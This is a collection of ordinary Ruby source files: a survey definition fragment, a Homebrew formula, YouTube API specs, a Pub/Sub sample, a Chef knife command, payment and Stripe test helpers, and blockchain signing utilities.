:requirement => ['exemplar_19']
label_exemplar_19 'You should <strong>build a community of people around your data</strong> to encourage wider use of your data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_19'
dependency :rule => 'A'
condition_A :q_engagementTeam, '==', :a_false
q_engagementTeamUrl 'Where is their home page?',
:discussion_topic => :engagementTeamUrl,
:display_on_certificate => true,
:text_as_statement => 'Community engagement is done by',
:required => :required
dependency :rule => 'A'
condition_A :q_engagementTeam, '==', :a_true
a_1 'Community Engagement Team Home Page URL',
:string,
:input_type => :url,
:placeholder => 'Community Engagement Team Home Page URL',
:required => :required
label_group_17 'Services',
:help_text => 'how you give people access to tools they need to work with your data',
:custom_renderer => '/partials/fieldset'
q_libraries 'Where do you list tools to work with your data?',
:discussion_topic => :libraries,
:display_on_certificate => true,
:text_as_statement => 'Tools to help use this data are listed at',
:help_text => 'Give a URL that lists the tools you know or recommend people can use when they work with your data.'
a_1 'Tool URL',
:string,
:input_type => :url,
:placeholder => 'Tool URL',
:requirement => ['exemplar_20']
label_exemplar_20 'You should <strong>provide a list of software libraries and other readily-available tools</strong> so that people can quickly get to work with your data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_20'
dependency :rule => 'A'
condition_A :q_libraries, '==', {:string_value => '', :answer_reference => '1'}
end
end
| 54.45384 | 727 | 0.690886 |
28dd5148950d07000c4516c18d1a338b1154d6d7 | 2,815 | class GitlabGem < Formula
desc "Ruby client and CLI for GitLab API"
homepage "https://github.com/NARKOZ/gitlab"
url "https://github.com/NARKOZ/gitlab/archive/v4.18.0.tar.gz"
sha256 "6967bbf68ebff61714d855da950cfac4c8c3825a80d79f9210b40e37f6ba752c"
license "BSD-2-Clause"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "551bcab9593a120bef2cd52443e90047dfba10de9d087dad66a0fa723f178021"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "def9a9ac03f51469e8d51be097377444079b8c7d0b1c1c49f4ded06c8b2d6bd4"
sha256 cellar: :any_skip_relocation, monterey: "551bcab9593a120bef2cd52443e90047dfba10de9d087dad66a0fa723f178021"
sha256 cellar: :any_skip_relocation, big_sur: "def9a9ac03f51469e8d51be097377444079b8c7d0b1c1c49f4ded06c8b2d6bd4"
sha256 cellar: :any_skip_relocation, catalina: "def9a9ac03f51469e8d51be097377444079b8c7d0b1c1c49f4ded06c8b2d6bd4"
sha256 cellar: :any_skip_relocation, x86_64_linux: "629debe754bd144df8ea7078fd310a5622517442a6910e01ee0745a24685f3b6"
end
uses_from_macos "ruby", since: :catalina
resource "httparty" do
url "https://rubygems.org/gems/httparty-0.18.1.gem"
sha256 "878fe8038e344b219dbba9e20c442914a2be251d2f4a20bcdeb31f25dcb2f79d"
end
resource "mime-types" do
url "https://rubygems.org/gems/mime-types-3.3.1.gem"
sha256 "708f737e28ceef48b9a1bc041aa9eec46fa36eb36acb95e6b64a9889131541fe"
end
resource "mime-types-data" do
url "https://rubygems.org/gems/mime-types-data-3.2020.0512.gem"
sha256 "a31c1705fec7fc775749742c52964a0e012968b43939e141a74f43ffecd6e5fc"
end
resource "multi_xml" do
url "https://rubygems.org/gems/multi_xml-0.6.0.gem"
sha256 "d24393cf958adb226db884b976b007914a89c53ad88718e25679d7008823ad52"
end
resource "terminal-table" do
url "https://rubygems.org/gems/terminal-table-1.8.0.gem"
sha256 "13371f069af18e9baa4e44d404a4ada9301899ce0530c237ac1a96c19f652294"
end
resource "unicode-display_width" do
url "https://rubygems.org/gems/unicode-display_width-1.7.0.gem"
sha256 "cad681071867a4cf52613412e379e39e85ac72b1d236677a2001187d448b231a"
end
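# The dependencies resolved above are vendored into libexec (used as a private
# GEM_HOME), the gitlab gem itself is built and installed there too, and the
# `gitlab` binstub is wrapped so it always runs with that GEM_HOME, keeping it
# isolated from user-installed gems.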
def install
ENV["GEM_HOME"] = libexec
resources.each do |r|
r.fetch
system "gem", "install", r.cached_download, "--ignore-dependencies",
"--no-document", "--install-dir", libexec
end
system "gem", "build", "gitlab.gemspec"
system "gem", "install", "--ignore-dependencies", "gitlab-#{version}.gem"
(bin/"gitlab").write_env_script libexec/"bin/gitlab", GEM_HOME: ENV["GEM_HOME"]
end
test do
ENV["GITLAB_API_ENDPOINT"] = "https://example.com/"
ENV["GITLAB_API_PRIVATE_TOKEN"] = "token"
output = shell_output("#{bin}/gitlab user 2>&1", 1)
assert_match "Server responded with code 404", output
end
end
| 41.397059 | 123 | 0.7627 |
0124f38e190c9171c8db3af7abbb88b8039ba241 | 9,883 | # encoding: UTF-8
require 'spec_helper'
require 'yt/models/channel'
describe Yt::Channel, :device_app do
subject(:channel) { Yt::Channel.new id: id, auth: $account }
context 'given someone else’s channel' do
let(:id) { 'UCxO1tY8h1AhOz0T4ENwmpow' }
it 'returns valid metadata' do
expect(channel.title).to be_a String
expect(channel.description).to be_a String
expect(channel.thumbnail_url).to be_a String
expect(channel.published_at).to be_a Time
expect(channel.privacy_status).to be_a String
expect(channel.view_count).to be_an Integer
expect(channel.video_count).to be_an Integer
expect(channel.subscriber_count).to be_an Integer
expect(channel.subscriber_count_visible?).to be_in [true, false]
end
describe '.videos' do
let(:video) { channel.videos.first }
specify 'returns the videos in the channel without tags or category ID' do
expect(video).to be_a Yt::Video
expect(video.snippet).not_to be_complete
end
describe '.where(id: *anything*)' do
let(:video) { channel.videos.where(id: 'invalid').first }
specify 'is ignored (all the channel’s videos are returned)' do
expect(video).to be_a Yt::Video
end
end
describe '.where(chart: *anything*)' do
let(:video) { channel.videos.where(chart: 'invalid').first }
specify 'is ignored (all the channel’s videos are returned)' do
expect(video).to be_a Yt::Video
end
end
describe '.includes(:statistics, :status)' do
let(:video) { channel.videos.includes(:statistics, :status).first }
specify 'eager-loads the statistics and status of each video' do
expect(video.instance_variable_defined? :@statistics_set).to be true
expect(video.instance_variable_defined? :@status).to be true
end
end
describe '.includes(:content_details)' do
let(:video) { channel.videos.includes(:content_details).first }
specify 'eager-loads the content details of each video' do
expect(video.instance_variable_defined? :@content_detail).to be true
end
end
describe '.includes(:category)' do
let(:video) { channel.videos.includes(:category, :status).first }
specify 'eager-loads the category (id and title) of each video' do
expect(video.instance_variable_defined? :@snippet).to be true
expect(video.instance_variable_defined? :@video_category).to be true
end
end
describe 'when the channel has more than 500 videos' do
let(:id) { 'UC0v-tlzsn0QZwJnkiaUSJVQ' }
specify 'the estimated and actual number of videos can be retrieved' do
# @note: in principle, the following counters should match, but
# in reality +video_count+ and +size+ are only approximations.
expect(channel.video_count).to be > 500
expect(channel.videos.size).to be > 500
end
end
end
describe '.playlists' do
describe '.includes(:content_details)' do
let(:playlist) { channel.playlists.includes(:content_details).first }
specify 'eager-loads the content details of each playlist' do
expect(playlist.instance_variable_defined? :@content_detail).to be true
end
end
end
it { expect(channel.playlists.first).to be_a Yt::Playlist }
it { expect{channel.delete_playlists}.to raise_error Yt::Errors::RequestError }
describe '.related_playlists' do
let(:related_playlists) { channel.related_playlists }
specify 'returns the list of associated playlists (Liked Videos, Uploads, ...)' do
expect(related_playlists.first).to be_a Yt::Playlist
end
specify 'includes public related playlists (such as Liked Videos)' do
uploads = related_playlists.select{|p| p.title.starts_with? 'Uploads'}
expect(uploads).not_to be_empty
end
specify 'does not include private playlists (such as Watch Later)' do
watch_later = related_playlists.select{|p| p.title.starts_with? 'Watch'}
expect(watch_later).to be_empty
end
end
specify 'with a public list of subscriptions' do
expect(channel.subscribed_channels.first).to be_a Yt::Channel
end
context 'with a hidden list of subscriptions' do
let(:id) { 'UCG0hw7n_v0sr8MXgb6oel6w' }
it { expect{channel.subscribed_channels.size}.to raise_error Yt::Errors::Forbidden }
end
# NOTE: These tests are slow because we *must* wait some seconds between
# subscribing and unsubscribing to a channel, otherwise YouTube will show
# wrong (cached) data, such as a user is subscribed when he is not.
context 'that I am not subscribed to', :slow do
let(:id) { 'UCCj956IF62FbT7Gouszaj9w' }
before { channel.throttle_subscriptions }
it { expect(channel.subscribed?).to be false }
it { expect(channel.unsubscribe).to be_falsey }
it { expect{channel.unsubscribe!}.to raise_error Yt::Errors::RequestError }
context 'when I subscribe' do
before { channel.subscribe }
after { channel.unsubscribe }
it { expect(channel.subscribed?).to be true }
it { expect(channel.unsubscribe!).to be_truthy }
end
end
context 'that I am subscribed to', :slow do
let(:id) { 'UCxO1tY8h1AhOz0T4ENwmpow' }
before { channel.throttle_subscriptions }
it { expect(channel.subscribed?).to be true }
# NOTE: These tests are commented out because YouTube randomly changed the
# behavior of the API without changing the documentation, so subscribing
# to a channel you are already subscribed to does not raise an error
# anymore.
# it { expect(channel.subscribe).to be_falsey }
# it { expect{channel.subscribe!}.to raise_error Yt::Errors::RequestError }
context 'when I unsubscribe' do
before { channel.unsubscribe }
after { channel.subscribe }
it { expect(channel.subscribed?).to be false }
it { expect(channel.subscribe!).to be_truthy }
end
end
end
context 'given my own channel' do
let(:id) { $account.channel.id }
let(:title) { 'Yt Test <title>' }
let(:description) { 'Yt Test <description>' }
let(:tags) { ['Yt Test Tag 1', 'Yt Test <Tag> 2'] }
let(:privacy_status) { 'unlisted' }
let(:params) { {title: title, description: description, tags: tags, privacy_status: privacy_status} }
specify 'subscriptions can be listed (hidden or public)' do
expect(channel.subscriptions.size).to be
end
describe 'playlists can be deleted' do
let(:title) { "Yt Test Delete All Playlists #{rand}" }
before { $account.create_playlist params }
it { expect(channel.delete_playlists title: %r{#{params[:title]}}).to eq [true] }
it { expect(channel.delete_playlists params).to eq [true] }
it { expect{channel.delete_playlists params}.to change{sleep 1; channel.playlists.count}.by(-1) }
end
# Can't subscribe to your own channel.
it { expect{channel.subscribe!}.to raise_error Yt::Errors::RequestError }
it { expect(channel.subscribe).to be_falsey }
it 'returns valid reports for channel-related metrics' do
# Some reports are only available to Content Owners.
# See content owner test for more details about what the methods return.
expect{channel.views}.not_to raise_error
expect{channel.comments}.not_to raise_error
expect{channel.likes}.not_to raise_error
expect{channel.dislikes}.not_to raise_error
expect{channel.shares}.not_to raise_error
expect{channel.subscribers_gained}.not_to raise_error
expect{channel.subscribers_lost}.not_to raise_error
expect{channel.videos_added_to_playlists}.not_to raise_error
expect{channel.videos_removed_from_playlists}.not_to raise_error
expect{channel.estimated_minutes_watched}.not_to raise_error
expect{channel.average_view_duration}.not_to raise_error
expect{channel.average_view_percentage}.not_to raise_error
expect{channel.annotation_clicks}.not_to raise_error
expect{channel.annotation_click_through_rate}.not_to raise_error
expect{channel.annotation_close_rate}.not_to raise_error
expect{channel.card_impressions}.not_to raise_error
expect{channel.card_clicks}.not_to raise_error
expect{channel.card_click_rate}.not_to raise_error
expect{channel.card_teaser_impressions}.not_to raise_error
expect{channel.card_teaser_clicks}.not_to raise_error
expect{channel.card_teaser_click_rate}.not_to raise_error
expect{channel.viewer_percentage}.not_to raise_error
expect{channel.estimated_revenue}.to raise_error Yt::Errors::Unauthorized
expect{channel.ad_impressions}.to raise_error Yt::Errors::Unauthorized
expect{channel.monetized_playbacks}.to raise_error Yt::Errors::Unauthorized
expect{channel.playback_based_cpm}.to raise_error Yt::Errors::Unauthorized
end
end
context 'given an unknown channel' do
let(:id) { 'not-a-channel-id' }
it { expect{channel.snippet}.to raise_error Yt::Errors::NoItems }
it { expect{channel.status}.to raise_error Yt::Errors::NoItems }
it { expect{channel.statistics_set}.to raise_error Yt::Errors::NoItems }
it { expect{channel.subscribe}.to raise_error Yt::Errors::RequestError }
describe 'starting with UC' do
let(:id) { 'UC-not-a-channel-id' }
# NOTE: This test is just a reflection of YouTube irrational behavior of
# returns 0 results if the name of an unknown channel starts with UC, but
# returning 100,000 results otherwise (ignoring the channel filter).
it { expect(channel.videos.count).to be_zero }
it { expect(channel.videos.size).to be_zero }
end
end
end
| 40.670782 | 105 | 0.691187 |
edaecc05f1f94bac7ceb608ee99bd033c1319704 | 1,538 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# [START pubsub_v1_generated_Subscriber_ListSubscriptions_sync]
require "google/cloud/pubsub/v1"
# Create a client object. The client can be reused for multiple calls.
client = Google::Cloud::PubSub::V1::Subscriber::Client.new
# Create a request. To set request fields, pass in keyword arguments.
request = Google::Cloud::PubSub::V1::ListSubscriptionsRequest.new
# Call the list_subscriptions method.
result = client.list_subscriptions request
# The returned object is of type Gapic::PagedEnumerable. You can
# iterate over all elements by calling #each, and the enumerable
# will lazily make API calls to fetch subsequent pages. Other
# methods are also available for managing paging directly.
result.each do |response|
# Each element is of type ::Google::Cloud::PubSub::V1::Subscription.
p response
end
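# Illustrative alternative (not part of the generated sample): pages can also
# be consumed explicitly. This assumes the Gapic::PagedEnumerable#each_page
# interface, where each page wraps one ListSubscriptionsResponse.
#
# result.each_page do |page|
#   page.each { |subscription| p subscription.name }
# end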
# [END pubsub_v1_generated_Subscriber_ListSubscriptions_sync]
| 38.45 | 74 | 0.780884 |
bf103678a870fc499b17ebf4c2f1c1f44dc6567e | 1,721 | #
# Author:: Tyler Cloke ([email protected])
# Copyright:: Copyright (c) 2015 Chef Software, Inc
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "chef/knife"
require "chef/knife/key_create_base"
class Chef
class Knife
# Implements knife client key create using Chef::Knife::KeyCreate
# as a service class.
#
# @author Tyler Cloke
#
# @attr_reader [String] actor the name of the client that this key is for
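    # Illustrative invocation (assumed CLI shape, not taken from this file):
    #
    #   knife client key create CLIENTNAME
    #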
class ClientKeyCreate < Knife
include Chef::Knife::KeyCreateBase
attr_reader :actor
def initialize(argv=[])
super(argv)
@service_object = nil
end
def run
apply_params!(@name_args)
service_object.run
end
def actor_field_name
"client"
end
def service_object
@service_object ||= Chef::Knife::KeyCreate.new(@actor, actor_field_name, ui, config)
end
def actor_missing_error
"You must specify a client name"
end
def apply_params!(params)
@actor = params[0]
if @actor.nil?
show_usage
ui.fatal(actor_missing_error)
exit 1
end
end
end
end
end
| 25.308824 | 92 | 0.661243 |
e8e1740ca5a7f76fc5842ae40bee3aa9bcec7f35 | 473 | #
# To run:
# clear; ruby extconf.rb ; make; ruby RubyTestSharedMemoryModuleGPIO2.rb
#
require_relative 'SharedMemoryGPIO2'
#WriteDataToSharedMemory("abcd12345")
smgpio2 = SharedMemoryGpio2.new
fromSharedMem = smgpio2.GetData()
puts "Content of fromSharedMem=#{fromSharedMem}"
# newData = "abcd12345"
# SharedMemoryGpio2.WriteData("This is a ruby test memory sharing.")
# fromSharedMem = SharedMemoryGpio2.GetData()
# puts "NEW Content of fromSharedMem=#{fromSharedMem}"
| 29.5625 | 72 | 0.784355 |
6106c4ff78070cb0860073aa6ac4da5432ae4cab | 421 | require 'digest/md5'
class MerbSlicePayson::Response
attr_reader :paysonref
def initialize(params, key = nil)
@ok_url = params['OkURL']
@paysonref = params['Paysonref']
@md5 = params['MD5']
@ref_nr = params['RefNr']
@fee = params['Fee']
@key = key || Payson[:key]
end
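  # Payson signs its callback by MD5-hashing OkURL + Paysonref + the merchant
  # key; valid? recomputes that digest and compares it with the MD5 value that
  # was posted back, so a mismatch indicates tampering or a misconfigured key.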
def valid?
@md5 == Digest::MD5.hexdigest(@ok_url + @paysonref + @key)
end
end
| 18.304348 | 62 | 0.574822 |
5d5f41faa0bb9ccca87fff4f9d69dc5c5ed3ba36 | 306 | class MigrateCalculatedAvailabilityValues < ActiveRecord::Migration
def up
Programmer.all.each do |programmer|
programmer.calculate_calculated_availability
# Do not force a successful save, as incomplete programmers are not valid
programmer.save
end
end
def down
end
end
| 23.538462 | 79 | 0.751634 |
1c0f303bca0e83e7f48b071ee982ee0fa7f34e43 | 444 | module Faye
class Transport::Local < Transport
def self.usable?(dispatcher, endpoint, &callback)
callback.call(Server === endpoint)
end
def batching?
false
end
def request(messages)
EventMachine.next_tick do
@endpoint.process(messages, nil) do |replies|
receive(Faye.copy_object(replies))
end
end
end
end
Transport.register 'in-process', Transport::Local
end
| 18.5 | 53 | 0.641892 |
7a964e118baa57708d4c4a74d920c03df57faf74 | 248 | require "openxml/drawingml/properties/paragraph_properties"
module OpenXml
module DrawingML
module Properties
class Level3ParagraphProperties < ParagraphProperties
namespace :a
tag :lvl3pPr
end
end
end
end
| 17.714286 | 59 | 0.717742 |
0839ceb7e6fe3c8e63c0710c3f8542c95d36257a | 1,078 | module SixSaferpay
module SixTransaction
class AssertRefundResponse
attr_accessor(:response_header,
:transaction_id,
:order_id,
:status,
:date
)
def initialize(response_header:,
               transaction_id:,
               order_id: nil,
               status:,
               date:)
@response_header = SixSaferpay::ResponseHeader.new(**response_header.to_h) if response_header
@transaction_id = transaction_id
@order_id = order_id
@status = status
@date = date
end
def to_hash
hash = Hash.new
hash.merge!(response_header: @response_header.to_h) if @response_header
hash.merge!(transaction_id: @transaction_id) if @transaction_id
hash.merge!(order_id: @order_id) if @order_id
hash.merge!(status: @status) if @status
hash.merge!(date: @date) if @date
hash
end
alias_method :to_h, :to_hash
end
end
end
| 26.95 | 101 | 0.548237 |
01c740b3afdaf92112db7b0dd8d5107042e663ac | 3,547 | # frozen_string_literal: true
require "rails_helper"
describe "api/v1/plans/_show.json.jbuilder" do
before(:each) do
@plan = create(:plan)
@data_contact = create(:contributor, data_curation: true, plan: @plan)
@pi = create(:contributor, investigation: true, plan: @plan)
@plan.contributors = [@data_contact, @pi]
create(:identifier, identifiable: @plan)
@plan.reload
end
describe "includes all of the DMP attributes" do
before(:each) do
render partial: "api/v1/plans/show", locals: { plan: @plan }
@json = JSON.parse(rendered).with_indifferent_access
end
it "includes the :title" do
expect(@json[:title]).to eql(@plan.title)
end
it "includes the :description" do
expect(@json[:description]).to eql(@plan.description)
end
it "includes the :language" do
expected = Api::V1::LanguagePresenter.three_char_code(
lang: LocaleService.default_locale
)
expect(@json[:language]).to eql(expected)
end
it "includes the :created" do
expect(@json[:created]).to eql(@plan.created_at.to_formatted_s(:iso8601))
end
it "includes the :modified" do
expect(@json[:modified]).to eql(@plan.updated_at.to_formatted_s(:iso8601))
end
it "includes :ethical_issues" do
expected = Api::V1::ConversionService.boolean_to_yes_no_unknown(@plan.ethical_issues)
expect(@json[:ethical_issues_exist]).to eql(expected)
end
it "includes :ethical_issues_description" do
expect(@json[:ethical_issues_description]).to eql(@plan.ethical_issues_description)
end
it "includes :ethical_issues_report" do
expect(@json[:ethical_issues_report]).to eql(@plan.ethical_issues_report)
end
it "returns the URL of the plan as the :dmp_id if no DOI is defined" do
expected = Rails.application.routes.url_helpers.api_v1_plan_url(@plan)
expect(@json[:dmp_id][:type]).to eql("url")
expect(@json[:dmp_id][:identifier]).to eql(expected)
end
it "includes the :contact" do
expect(@json[:contact][:mbox]).to eql(@data_contact.email)
end
it "includes the :contributors" do
emails = @json[:contributor].collect { |c| c[:mbox] }
expect(emails.include?(@pi.email)).to eql(true)
end
# TODO: make sure this is working once the new Cost theme and Currency
# question type have been implemented
it "includes the :cost" do
expect(@json[:cost]).to eql(nil)
end
it "includes the :project" do
expect(@json[:project].length).to eql(1)
end
it "includes the :dataset" do
expect(@json[:dataset].length).to eql(1)
end
it "includes the :dmproadmap_template" do
expect(@json[:dmproadmap_template].present?).to eql(true)
end
it "includes the :dmproadmap_template - :id and :title" do
expect(@json[:dmproadmap_template][:id]).to eql(@plan.template.id)
expect(@json[:dmproadmap_template][:title]).to eql(@plan.template.title)
end
end
describe "when the system mints DOIs" do
before(:each) do
Rails.configuration.x.allow_doi_minting = true
@doi = create(:identifier, value: "10.9999/123abc.zy/x23", identifiable: @plan)
@plan.reload
render partial: "api/v1/plans/show", locals: { plan: @plan }
@json = JSON.parse(rendered).with_indifferent_access
end
it "returns the DOI for the :dmp_id if one is present" do
expect(@json[:dmp_id][:type]).to eql("doi")
expect(@json[:dmp_id][:identifier]).to eql(@doi.value)
end
end
end
| 34.105769 | 91 | 0.670426 |
e827f69faa0b839c3d9be4d880a793bb292498ee | 104 | class DebugMigration < ActiveRecord::Migration[4.2]
def change
puts "RUNNING MIGRATION"
end
end
| 17.333333 | 51 | 0.740385 |
21e53e1efa4742e652301c0cf1740c6a58d31c5e | 355 | module Ctgov
class OutcomeAnalysis < Ctgov::StudyRelationship
belongs_to :outcome, inverse_of: :outcome_analyses, autosave: true
has_many :outcome_analysis_groups, inverse_of: :outcome_analysis, autosave: true
has_many :result_groups, :through => :outcome_analysis_groups
def groups
outcome_analysis_groups
end
end
end
| 27.307692 | 86 | 0.757746 |
2683884486ab4d91790cf6dce26cc054c3ec12ee | 4,373 | module StripeMock
module TestStrategies
class Base
def list_skus(limit)
Stripe::SKU.list(limit: limit)
end
def create_sku(params={})
Stripe::SKU.create create_sku_params(params)
end
def create_sku_params(params={})
currency = params[:currency] || StripeMock.default_currency
{
:id => 'stripe_mock_default_sku_id',
:currency => currency,
:inventory => {
type: 'infinite'
},
:price => 1234,
:product => 'stripe_mock_default_product_id'
}.merge(params)
end
def list_products(limit)
Stripe::Product.list(limit: limit)
end
def create_product(params={})
Stripe::Product.create create_product_params(params)
end
def create_product_params(params={})
{
:id => 'stripe_mock_default_product_id',
:name => 'Default Product',
:type => 'service'
}.merge(params)
end
def retrieve_product(product_id)
Stripe::Product.retrieve(product_id)
end
def list_plans(limit)
Stripe::Plan.list(limit: limit)
end
def create_plan(params={})
Stripe::Plan.create create_plan_params(params)
end
def create_plan_params(params={})
{
:id => 'stripe_mock_default_plan_id',
:interval => 'month',
:currency => StripeMock.default_currency,
:product => nil, # need to override yourself to pass validations
:amount => 1337
}.merge(params)
end
def list_subscriptions(limit)
Stripe::Subscription.list(limit: limit)
end
def generate_card_token(card_params={})
card_data = { :number => "4242424242424242", :exp_month => 9, :exp_year => (Time.now.year + 5), :cvc => "999", :tokenization_method => nil }
card = StripeMock::Util.card_merge(card_data, card_params)
card[:fingerprint] = StripeMock::Util.fingerprint(card[:number]) if StripeMock.state == 'local'
stripe_token = Stripe::Token.create(:card => card)
stripe_token.id
end
def generate_bank_token(bank_account_params={})
currency = bank_account_params[:currency] || StripeMock.default_currency
bank_account = {
:country => "US",
:currency => currency,
:account_holder_name => "Jane Austen",
:account_holder_type => "individual",
:routing_number => "110000000",
:account_number => "000123456789"
}.merge(bank_account_params)
bank_account[:fingerprint] = StripeMock::Util.fingerprint(bank_account[:account_number]) if StripeMock.state == 'local'
stripe_token = Stripe::Token.create(:bank_account => bank_account)
stripe_token.id
end
def create_coupon_params(params = {})
currency = params[:currency] || StripeMock.default_currency
{
id: '10BUCKS',
amount_off: 1000,
currency: currency,
max_redemptions: 100,
metadata: {
created_by: 'admin_acct_1'
},
duration: 'once'
}.merge(params)
end
def create_coupon_percent_of_params(params = {})
{
id: '25PERCENT',
percent_off: 25,
redeem_by: nil,
duration_in_months: 3,
duration: :repeating
}.merge(params)
end
def create_checkout_session_params(params = {})
{
payment_method_types: ['card'],
line_items: [{
name: 'T-shirt',
quantity: 1,
amount: 500,
currency: 'usd',
}],
}.merge(params)
end
def create_coupon(params = {})
Stripe::Coupon.create create_coupon_params(params)
end
def create_checkout_session(params = {})
Stripe::Checkout::Session.create create_checkout_session_params(params)
end
def delete_all_coupons
coupons = Stripe::Coupon.list
coupons.data.map(&:delete) if coupons.data.count > 0
end
def prepare_card_error
StripeMock.prepare_card_error(:card_error, :new_customer) if StripeMock.state == 'local'
end
end
end
end
| 28.581699 | 148 | 0.57512 |
7a87661e14a23dc098d38982b95aa8d6289e9f20 | 693 | module ErrorMessagesHelper
# Render error messages for the given objects.
# The :message option is allowed.
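  #
  # A usage sketch (the instance variables and message text here are
  # assumptions for the example, not part of this helper):
  #
  #   <%= error_messages_for(@user, @profile,
  #                          :message => "Please correct the fields below.") %>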
def error_messages_for(*objects)
options = objects.extract_options!
options[:message] ||= I18n.t(:"activerecord.errors.message", :default => "One or more fields need to be supplied or corrected.")
messages = objects.compact.map { |o| o.errors.full_messages }.flatten
unless messages.empty?
content_tag(:div, :class => "error_messages box_radius") do
list_items = messages.map { |msg| content_tag(:li, msg.html_safe) }
content_tag(:p, options[:message].html_safe) + content_tag(:ul, list_items.join.html_safe)
end
end
end
end
| 36.473684 | 132 | 0.701299 |
3820cef88363da2d5e4ed9f832eb1581cf976944 | 124 | # frozen_string_literal: true
class Admin::BaseController < ApplicationController
before_action :authenticate_admin!
end
| 20.666667 | 51 | 0.83871 |
216420990304eaf9af5cf25955c96d3142ce21d3 | 1,900 | # frozen_string_literal: true
module Beta
module Types
module Objects
class WorkImageType < Beta::Types::Objects::Base
implements GraphQL::Relay::Node.interface
global_id_field :id
field :anikuto_id, Integer, null: true
field :work, Beta::Types::Objects::WorkType, null: true
field :facebook_og_image_url, String, null: true
field :twitter_avatar_url, String, null: true
field :twitter_mini_avatar_url, String, null: true
field :twitter_normal_avatar_url, String, null: true
field :twitter_bigger_avatar_url, String, null: true
field :recommended_image_url, String, null: true
field :internal_url, String, null: true do
argument :size, String, required: true
end
def work
Beta::RecordLoader.for(Work).load(object.work_id)
end
def internal_url(size:)
return unless context[:doorkeeper_token].owner.role.admin?
return '' if object.blank?
ann_image_url object, :image, size: size
end
def facebook_og_image_url
return '' if object.blank?
object.work.facebook_og_image_url
end
def twitter_avatar_url
return '' if object.blank?
object.work.twitter_avatar_url
end
def twitter_mini_avatar_url
return '' if object.blank?
object.work.twitter_avatar_url(:mini)
end
def twitter_normal_avatar_url
return '' if object.blank?
object.work.twitter_avatar_url(:normal)
end
def twitter_bigger_avatar_url
return '' if object.blank?
object.work.twitter_avatar_url(:bigger)
end
def recommended_image_url
return '' if object.blank?
object.work.recommended_image_url
end
end
end
end
end
| 25.675676 | 68 | 0.626316 |
bf4bd053e4d262bebeec3fa79ac373f45828f7e8 | 599 | # -*- encoding : utf-8 -*-
class UserObserver < ActiveRecord::Observer
observe :user
def before_validation(user)
user.password = SecureRandom.hex(4) unless user.password || user.persisted?
end
  def after_initialize(user)
    user.name.force_encoding(Encoding::UTF_8) unless user.name.nil?
  end
def after_create(user)
if user.has_facebook_authentication?
Notification.create_notification_once(:temporary_password,
user,
{id: user.id},
password: user.password)
end
end
def before_save(user)
user.fix_twitter_user
end
end
| 21.392857 | 79 | 0.691152 |
9166e33401464a0b48d8579bf677ff63d7485e61 | 1,044 | class CLI
def call
welcome
puts "************************************************************"
title_list
get_user_input
display_articles
done
end
def welcome
puts "Welcome informed citizen!"
end
def title_list
Scraper.scrape
AllTop.all.each_with_index do |alltop_obj, i|
puts "#{i+1}. #{alltop_obj.news_name}"
end
end
  def get_user_input
    input = nil
    puts "Where do you wish to go? Select a number or type exit:"
    until input == "exit" do
      input = gets.strip
      if input.to_i.between?(1,14)
        @selected_index = input.to_i - 1
        display_articles
        get_user_input
      else
        done
      end
    end
  end
def display_articles
alltop_obj = AllTop.all[@selected_index]
alltop_obj.articles.each do |article_obj|
puts "************************************************************"
puts "Article Headline: #{article_obj.title}\n\n "
puts "Teaser: #{article_obj.quote}\n\n "
puts "Link for Further Info: #{article_obj.article_url}"
end
end
def done
puts "That's enough news for now. Until next time!"
exit
end
end
| 17.694915 | 69 | 0.627395 |
3814c8e6509ea523dca4a887d9071e85933a7ab4 | 2,538 | # frozen_string_literal: true
require "secp256k1"
module CKB
module Utils
def self.hex_to_bin(hex)
hex = hex[2..-1] if hex.start_with?("0x")
[hex].pack("H*")
end
def self.bin_to_hex(bin)
bin.unpack1("H*")
end
def self.bin_to_prefix_hex(bin)
"0x#{bin_to_hex(bin)}"
end
def self.extract_pubkey_bin(privkey_bin)
Secp256k1::PrivateKey.new(privkey: privkey_bin).pubkey.serialize
end
def self.json_script_to_type_hash(script)
blake2b = CKB::Blake2b.new
blake2b << hex_to_bin(script[:binary_hash]) if script[:binary_hash]
args = script[:args] || []
args.each do |arg|
blake2b << arg
end
bin_to_prefix_hex(blake2b.digest)
end
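    # Builds a SIGHASH_ALL style signature: hashes the sighash type, each
    # input's previous output, and each output's capacity and script hashes
    # with Blake2b, signs the digest with the given private key, and returns
    # the inputs with the hex signature and the sighash type appended to
    # their args.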
def self.sign_sighash_all_inputs(inputs, outputs, privkey)
blake2b = CKB::Blake2b.new
sighash_type = 0x1.to_s
blake2b.update(sighash_type)
inputs.each do |input|
previous_output = input[:previous_output]
blake2b.update(hex_to_bin(previous_output[:hash]))
blake2b.update(previous_output[:index].to_s)
end
outputs.each do |output|
blake2b.update(output[:capacity].to_s)
blake2b.update(hex_to_bin(json_script_to_type_hash(output[:lock])))
next unless output[:type]
blake2b.update(
hex_to_bin(
json_script_to_type_hash(output[:type])
)
)
end
key = Secp256k1::PrivateKey.new(privkey: privkey)
signature_bin = key.ecdsa_serialize(
key.ecdsa_sign(blake2b.digest, raw: true)
)
signature_hex = bin_to_hex(signature_bin)
inputs.map do |input|
args = input[:args] + [signature_hex, sighash_type]
input.merge(args: args)
end
end
    # In Ruby, bytes are represented using String.
    # Since JSON has no native byte arrays, the CKB convention is to pass
    # bytes as hex strings with a "0x" prefix, hence we have to do type
    # conversions here.
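    #
    # For example (illustrative values only):
    #
    #   bin_to_prefix_hex("\x12\x34") # => "0x1234"
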